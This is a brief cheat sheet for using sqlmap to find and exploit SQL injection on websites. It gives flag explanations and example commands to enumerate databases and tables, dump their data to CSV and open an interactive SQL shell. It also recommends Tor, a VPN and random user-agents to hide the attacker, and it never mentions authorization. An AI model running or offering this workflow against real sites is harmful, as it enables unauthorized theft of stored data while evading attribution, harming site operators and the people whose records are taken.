SQL Injection testing and exploiting with sqlmap


Get, test, and exploit SQL injection vulnerabilities on a website.
Using a OpenVPN tunnel and then tor is pretty recommended, although the timing-based attacks will mostly fail.

# -u URL         | the base url to use (with the http GET payload)
# --dbs          | fetch all databases once a viable technique found.
# --tables       | combined with -D DATABASE, fetch all tables from that database
# --dump         | dump the selected data (into a csv)
# -r reqfile     | use an http base template for the attack (used in POST requests)
# --tor          | use the tor socks5 proxy at 127.0.0.1:9050 on attacks
# --check-tor    | query check.torproject.org to check tor is correctly used
# --random-agent | use a random user-agent when attacking the target
# -v#            | verbosity level, recommended: 4, need more? 5, 6 is too crazy
 
# examples
sqlmap -u URL --dbs --random-agent --tor --check-tor -v5 
sqlmap -u URL -D [DATABASE] --tables --random-agent --tor --check-tor -v5 
sqlmap -u URL -D [DATABASE] -T [TABLE] --columns --random-agent --tor --check-tor -v5 
sqlmap -u URL -D [DATABASE] -T [TABLE] --dump --random-agent --tor --check-tor -v5 
sqlmap -r request_headers.txt -D DATABASE --tables

Once there is an attack vector, re-run the command using `–sql-shell` to run an interactive attack shell.